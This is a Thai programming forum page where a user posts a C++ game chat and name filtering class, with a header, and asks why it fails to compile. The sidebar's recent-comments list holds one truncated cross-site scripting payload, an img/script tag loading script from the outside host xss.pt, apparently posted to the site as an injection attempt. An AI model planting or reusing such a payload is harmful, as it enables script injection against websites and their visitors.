หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 Webboard

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

กระทู้ #3073 [C]

รบกวนพวกพี่ๆๆช่วยน่อยครับ compile ไม่ผ่าน

ขอบคุณที่ให้ความรู้สำหรับ
จากคุณ : smitt / soon_ten@hotmail.com [2011-05-09 17:48:41]  

14.207.74.61 ความคิดเห็น #28341 (จาก IP: 14.207.74.61)
FilteringTable.cpp(199): error C2440: 'initializing' : cannot convert from 'CFilteringTable::IsInvalidCharInclude::eKind' to 'LPCTSTR'
-----------------------
code
-----------------------
#include "StdAfx.h"
#include "FilteringTable.h"
#include "MHFile.h"

extern int g_nServerSetNum;

BOOL FindPartially(const CFilteringTable::Text& lhs, const CFilteringTable::Text& rhs)
{
return 0 < _tcsstr(
lhs.c_str(),
rhs.c_str());
}

CFilteringTable::CFilteringTable() :
m_eFilterExceptionType(FET_NONE)
{
LoadScript();
}

CFilteringTable::~CFilteringTable()
{}

CFilteringTable* CFilteringTable::GetInstance()
{
static CFilteringTable instance;

return &instance;
}

void CFilteringTable::LoadScript()
{
CMHFile file;
file.Init(
_T("system\\resource\\filterWord.bin"),
_T("rb"));

Type type = TypeNone;

while(FALSE == file.IsEOF())
{
TCHAR buffer[MAX_PATH] = {0};
file.GetLine(
buffer,
sizeof(buffer) / sizeof(*buffer));

if(0 == _tcslen(buffer))
{
continue;
}

LPCTSTR commentMark = _T("@");

if(0 == _tcsnicmp(buffer, commentMark, _tcslen(commentMark)))
{
continue;
}
else if(0 == _tcsicmp(buffer, _T("#GM")))
{
type = TypePartiallyBlockedName;
continue;
}
else if(0 == _tcsicmp(buffer, _T("#SLANG")))
{
type = TypePartiallyBlockedKeyword;
continue;
}
else if(0 == _tcsicmp(buffer, _T("#SYSTEM")))
{
type = TypeEntirelyBlockedName;
continue;
}

TCHAR text[MAX_PATH] = {0};
RemoveSpace(
buffer,
text,
sizeof(text) / sizeof(*text));
_tcsupr(
text);

KeywordContainer& keywordContainer = mFilterContainer[type];
keywordContainer.insert(
text);
}
}

void CFilteringTable::RemoveSpace(LPCTSTR textInput, LPTSTR textOutput, size_t size) const
{
TCHAR buffer[MAX_PATH] = {0};

for(PUCHAR inputPointer = PUCHAR(textInput);
0 < *inputPointer;
inputPointer = _mbsinc((const PUCHAR)inputPointer))
{
LPCTSTR removedSpeicalCharacter = _T("\t\n\r ~`!@#$%^&*()-_=+\\|<,>.?/");

if(_tcschr(removedSpeicalCharacter, *inputPointer))
{
continue;
}

_tcsncat(
buffer,
LPCTSTR(inputPointer),
IsDBCSLeadByte(*inputPointer) ? 2 : 1);
}

SafeStrCpy(
textOutput,
buffer,
size);
}

BOOL CFilteringTable::IsInvalidText(Type type, LPCTSTR text) const
{
const FilterContainer::const_iterator filterIterator = mFilterContainer.find(
type);

if(mFilterContainer.end() == filterIterator)
{
return FALSE;
}

const KeywordContainer& keywordContainer = filterIterator->second;

TCHAR buffer[MAX_PATH] = {0};
RemoveSpace(
text,
buffer,
sizeof(buffer) / sizeof(*buffer));
_tcsupr(
buffer);

if(TypeEntirelyBlockedName == type)
{
return keywordContainer.end() != keywordContainer.find(
buffer);
}

const Text checkedText(buffer);

for(KeywordContainer::const_iterator iterator = keywordContainer.begin();
keywordContainer.end() != iterator;
++iterator)
{
if(FindPartially(checkedText, *iterator))
{
return TRUE;
}
}

return FALSE;
}

BOOL CFilteringTable::FilterChat(LPCTSTR pChat )
{
return IsInvalidText(
TypePartiallyBlockedKeyword,
pChat);
}

BOOL CFilteringTable::IsUsableName(LPCTSTR text)
{
if(IsInvalidText(TypeEntirelyBlockedName, text))
{
return FALSE;
}
else if(IsInvalidText(TypePartiallyBlockedName, text))
{
return FALSE;
}
else if(IsInvalidText(TypePartiallyBlockedKeyword, text))
{
return FALSE;
}

return TRUE;
}

BOOL CFilteringTable::IsInvalidCharInclude( unsigned char* pStr, BOOL AllowAllDBC /*= FALSE*/ )
{
BOOL bOk = FALSE;
#ifdef _TL_LOCAL_
enum eKind
{
NONE,
CONSO, //consonant
V_UP, //vowel in upper
SV_UP, //special vowel in upper
V_SIDE, //vowel in side
V_UN, //vowel in under
V_UPSI, //vowel in upper and side
SOU, //special in upper
ENG, //english and number
}
LastKind = NONE;

LPCTSTR thai[255] = {
error--> NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE,
NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE,
NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE,
ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, NONE, NONE, NONE, NONE, NONE, NONE,
NONE, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG,
ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, NONE, NONE, NONE, NONE, NONE,
NONE, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG,
ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, ENG, NONE, NONE, NONE, NONE, NONE,
NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE,
NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE,

NONE, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO,
CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO,
CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO, CONSO,

V_SIDE, V_UP, V_SIDE, V_UPSI, V_UP, V_UP, V_UP, V_UP, V_UN, V_UN, NONE, NONE, NONE, NONE, NONE, NONE,
V_SIDE, V_SIDE, V_SIDE, V_SIDE, V_SIDE, V_SIDE, V_SIDE, SV_UP, SOU, SOU, SOU, SOU, SOU, NONE, NONE, NONE,
NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE
};
#endif
while( *pStr )
{
bOk = FALSE;

if( IsDBCSLeadByte( *pStr ) )
{
if( AllowAllDBC )
{
bOk = TRUE;
}
else
{
#ifdef _JAPAN_LOCAL_
if( IsInDBCRange( MAKEWORD(pStr[1],pStr[0]) ) )
bOk = TRUE;
#elif defined _ML_LOCAL_

if( g_nServerSetNum != 1 || g_pServerSystem->IsTestServer() )
{
//big5 only chinese character (http://www.microsoft.com/globaldev/reference/dbcs/950.mspx)
if( ( pStr[0] >= 0xa4 && pStr[0] <= 0xc5 ) || ( pStr[0] >= 0xc9 && pStr[0] <= 0xf8 ) )
{
if( ( pStr[1] >= 0x40 && pStr[1] < 0x7f ) || ( pStr[1] > 0xa0 && pStr[1] < 0xff ) )
bOk = TRUE;
}
else if( pStr[0] == 0xc6 )
{
if( pStr[1] >= 0x40 && pStr[1] < 0x7f )
bOk = TRUE;
}
else if( pStr[0] == 0xf9 )
{
if( ( pStr[1] >= 0x40 && pStr[1] < 0x7f ) || ( pStr[1] > 0xa0 && pStr[1] <= 0xdc ) )
bOk = TRUE;
}
}
#elif defined _TW_LOCAL_
{
//big5 only chinese character (http://www.microsoft.com/globaldev/reference/dbcs/950.mspx)
if( ( pStr[0] >= 0xa4 && pStr[0] <= 0xc5 ) || ( pStr[0] >= 0xc9 && pStr[0] <= 0xf8 ) )
{
if( ( pStr[1] >= 0x40 && pStr[1] < 0x7f ) || ( pStr[1] > 0xa0 && pStr[1] < 0xff ) )
bOk = TRUE;
}
else if( pStr[0] == 0xc6 )
{
if( pStr[1] >= 0x40 && pStr[1] < 0x7f )
bOk = TRUE;
}
else if( pStr[0] == 0xf9 )
{
if( ( pStr[1] >= 0x40 && pStr[1] < 0x7f ) || ( pStr[1] > 0xa0 && pStr[1] <= 0xdc ) )
bOk = TRUE;
}
/*
if( pStr[0] >= 0xa1 && pStr[0] <=0xf9 &&
( pStr[1] >= 0x40 && pStr[1] <= 0x7e ||
pStr[1] >= 0xa1 && pStr[1] <= 0xfe ) )
{
bOk = TRUE;
}
*/
}
/* if( pStr[0] >= 0xa4 && pStr[0] <=0xc6 && pStr[1] >= 0x40 && pStr[1] <= 0x7e )//0xA440-0xC67E
{
bOk = TRUE;
}
else if( pStr[0] >= 0xc9 && pStr[0] <= 0xf9 && pStr[1] >= 0x40 && pStr[1] <= 0xd5 )//0xC940-0xF9D5
{
bOk = TRUE;
}
*/
///////////
#elif defined _TL_LOCAL_

bOk = FALSE;
#else
if( pStr[0] >= 0xb0 && pStr[0] <=0xc8 && pStr[1] >= 0xa1 && pStr[1] <= 0xfe )//0xB0A1~0xC8FE
{
bOk = TRUE;
}
else if( pStr[0] >= 0x81 && pStr[0] <= 0xc6 && pStr[1] >= 0x41 && pStr[1] <= 0xfe )
{
bOk = TRUE;
}

if( pStr[0] >= 0xa1 && pStr[0] <= 0xac && pStr[1] >= 0x80 && pStr[1] <= 0xfe )
{
bOk = FALSE;
}
#endif
}

++pStr;
}
else
{
//ฟตนฎ
if( ( *pStr >= 'A' && *pStr <= 'Z' ) || ( *pStr >= 'a' && *pStr <= 'z' ) )
bOk = TRUE;
//ผ�ภฺ
else if( *pStr >= '0' && *pStr <= '9' )
bOk = TRUE;
#ifdef _JAPAN_LOCAL_
else if( *pStr >= 0xa6 && *pStr <= 0xdf ) //ภฯบป น�ฐขนฎภฺ //// Halfwidth Katakana Letter Wo ~ Halfwidth Katakana Semi-Voiced Sound Mark
bOk = TRUE;
#endif
#ifdef _TL_LOCAL_
else if( thai[*pStr] == CONSO || thai[*pStr] == V_SIDE )
{
bOk = TRUE;
}
else if( thai[*pStr] == V_UP || thai[*pStr] == SV_UP || thai[*pStr] == V_UN || thai[*pStr] == V_UPSI )
{
if( LastKind == CONSO )
bOk = TRUE;
}
else if( thai[*pStr] == SOU )
{
if( LastKind == CONSO || LastKind == V_UP || LastKind == V_UN )
bOk = TRUE;
}

LastKind = thai[*pStr];

#endif
if (IsExceptionInvalidCharInclude(pStr))
{
bOk = TRUE;
}
}

++pStr;

if( bOk == FALSE )
{
SetExceptionInvalidCharIncludeType(FET_NONE);
return TRUE;
}
}

SetExceptionInvalidCharIncludeType(FET_NONE);
return FALSE;
}

// desc_hseos_นฎภฺวสลอธต01
// S นฎภฺวสลอธต ร฿ฐก added by hseos 2007.06.25
// ..วสลอธตฟกผญ มฆฟ�วา นฎภฺ รณธฎ
BOOL CFilteringTable::IsExceptionInvalidCharInclude(unsigned char* pszText)
{
switch(m_eFilterExceptionType)
{
case FET_WHISPER_CHARNAME:
if (*pszText == '[' || *pszText == ']')
{
return TRUE;
}
}

return FALSE;
}

BOOL CFilteringTable::IsCharInString( const char* pStr, const char* pNoChar )
{
while( *pStr )
{
if( IsDBCSLeadByte( *pStr ) )
{
++pStr;
}
else
{
const char* p = pNoChar;
while( *p )
{
if( *pStr == *p ) return TRUE;
++p;
}
}
++pStr;
}

return FALSE;
}

BOOL CFilteringTable::IsInDBCRange(WORD character) const
{
struct DoubleByteCharacter
{
WORD Start;
WORD End;
};

const DoubleByteCharacter doubleByteCharacterArray[] =
{
// 2 BYTE Characters.
{ 0x815b, 0x815b }, // Katakana-Hiragana Prolonged Sound Mark
{ 0x8199, 0x81a5 }, // White Star ~ Black Down-pointing Ttriangle
{ 0x81f2, 0x81f5 }, // Music Sharp Sign ~ Dagger
{ 0x824F, 0x8258 }, // Fullwidth Digit Zero ~ Fullwidth Digit Nine
{ 0x8260, 0x8279 }, // Fullwidth Latin Capital Letter A ~ Fullwidth Latin Capital Letter Z
{ 0x8281, 0x829a }, // Fullwidth Latin Small Letter A ~ Fullwidth Latin Small Letter Z
{ 0x829f, 0x82f1 }, // Hiragana Letter Small A ~ Hiragana Letter N
{ 0x8340, 0x837e }, // Katakana Letter Small A ~ Katakana Letter Small Me
{ 0x8380, 0x8396 }, // Katakana Letter Small Mu ~ Katakana Letter Small Ke
{ 0x8794, 0x8794 }, // N-Ary Summation
{ 0x8740, 0x875d }, // Circled Digit One ~ Roman Numeral Ten
{ 0xfa40, 0xfa49 }, // Small Roman Numeral One ~ Small Roman Numeral Ten
// Kanji.. !!!!! TT
{ 0x889f, 0x88fc }, { 0x8940, 0x897e }, { 0x8980, 0x89fc }, { 0x8a40, 0x8a7e }, { 0x8a80, 0x8afc }, { 0x8b40, 0x8b7e },
{ 0x8b80, 0x8bfc }, { 0x8c40, 0x8c7e }, { 0x8c80, 0x8cfc }, { 0x8d40, 0x8d7e }, { 0x8d80, 0x8dfc }, { 0x8e40, 0x8e7e },
{ 0x8e80, 0x8efc }, { 0x8f40, 0x8f7e }, { 0x8f80, 0x8ffc }, { 0x9040, 0x907e }, { 0x9080, 0x90fc }, { 0x9140, 0x917e },
{ 0x9180, 0x91fc }, { 0x9240, 0x927e }, { 0x9280, 0x92fc }, { 0x9340, 0x937e }, { 0x9380, 0x93fc }, { 0x9440, 0x947e },
{ 0x9480, 0x94fc }, { 0x9540, 0x957e }, { 0x9580, 0x95fc }, { 0x9640, 0x967e }, { 0x9680, 0x96fc }, { 0x9740, 0x977e },
{ 0x9780, 0x97fc }, { 0x9840, 0x9872 }, { 0x989f, 0x98fc }, { 0x9940, 0x997e }, { 0x9980, 0x99fc }, { 0x9a40, 0x9a7e },
{ 0x9a80, 0x9afc }, { 0x9b40, 0x9b7e }, { 0x9b80, 0x9bfc }, { 0x9c40, 0x9c7e }, { 0x9c80, 0x9cfc }, { 0x9d40, 0x9d7e },
{ 0x9d80, 0x9dfc }, { 0x9e40, 0x9e7e }, { 0x9e80, 0x9efc }, { 0x9f40, 0x9f7e }, { 0x9f80, 0x9ffc }, { 0xe040, 0xe07e },
{ 0xe080, 0xe0fc }, { 0xe140, 0xe17e }, { 0xe180, 0xe1fc }, { 0xe240, 0xe27e }, { 0xe280, 0xe2fc }, { 0xe340, 0xe37e },
{ 0xe380, 0xe3fc }, { 0xe440, 0xe47e }, { 0xe480, 0xe4fc }, { 0xe540, 0xe57e }, { 0xe580, 0xe5fc }, { 0xe640, 0xe67e },
{ 0xe680, 0xe6fc }, { 0xe740, 0xe77e }, { 0xe780, 0xe7fc }, { 0xe840, 0xe87e }, { 0xe880, 0xe8fc }, { 0xe940, 0xe97e },
{ 0xe980, 0xe9fc }, { 0xea40, 0xea7e }, { 0xea80, 0xeaa4 }, { 0xed40, 0xed7e }, { 0xed80, 0xedfc }, { 0xee40, 0xee7e },
{ 0xee80, 0xeeec }, { 0xfa5c, 0xfa7e }, { 0xfa80, 0xfafc }, { 0xfb40, 0xfb7e }, { 0xfb80, 0xfbfc }, { 0xfc40, 0xfc4b }
};

for(size_t i = sizeof(doubleByteCharacterArray) / sizeof(*doubleByteCharacterArray);
0 < i--;)
{
const DoubleByteCharacter& doubleByteCharacter = doubleByteCharacterArray[i];

if(doubleByteCharacter.Start > character)
{
continue;
}
else if(doubleByteCharacter.End < character)
{
continue;
}

return TRUE;
}

return FALSE;
}

------
code
------
#pragma once

#define FILTERTABLE CFilteringTable::GetInstance()

// ..วสลอธตฟกผญ ฟนฟ�ทฮ รณธฎวา ฐๆฟ์ ฑื ลธภิ
enum FILTER_EXCEPTION_TYPE
{
FET_NONE = 0,
FET_WHISPER_CHARNAME, // ฑำธป ฤณธฏลอธํ
};

class CFilteringTable
{
protected:
#ifdef _UNICODE
typedef std::wstring Text;
#else
typedef std::string Text;
#endif
friend BOOL FindPartially(const Text&, const Text&);
typedef std::set< Text > KeywordContainer;
enum Type
{
TypeNone,
TypePartiallyBlockedName,
TypeEntirelyBlockedName,
TypePartiallyBlockedKeyword,
};
typedef std::map< Type, KeywordContainer > FilterContainer;
FilterContainer mFilterContainer;
FILTER_EXCEPTION_TYPE m_eFilterExceptionType;

protected:
CFilteringTable();
virtual ~CFilteringTable();
void LoadScript();
BOOL IsInvalidText(Type, LPCTSTR) const;
BOOL IsInDBCRange(WORD DBChar) const;
BOOL IsExceptionInvalidCharInclude(unsigned char* pszText);
void RemoveSpace(LPCTSTR, LPTSTR, size_t) const;

public:
static CFilteringTable* GetInstance();
BOOL IsInvalidCharInclude(unsigned char* pStr, BOOL AllowAllDBC = FALSE);
BOOL IsUsableName(LPCTSTR);
BOOL FilterChat(LPCTSTR);
BOOL IsCharInString(const char* pStr, const char* pNoChar);
void SetExceptionInvalidCharIncludeType(FILTER_EXCEPTION_TYPE eFilterExceptionType) { m_eFilterExceptionType = eFilterExceptionType; }
};

ช่วยน่อยนะครับพอดีไม่ค่อยเก่ง
จากคุณ : smitt / soon_ten@hotmail.com [2011-05-09 17:54:41]
ตอบกระทู้
  • ห้ามการโฆษณา หากต้องการติดต่อหาลูกค้า ติดต่อโฆษณาโดยตรงได้ที่ webmaster@sourcecode.in.th
  • ห้ามใช้คำหยาบและคำพูดที่ไม่เหมาะสม
  • ขอสงวนสิทธิหากตรวจพบ ข้อความที่ไม่เหมาะสม ข้อความนั้นจะถูกลบทันที
ชื่อ
อีเมล์
รายละเอียด

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 
 
หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th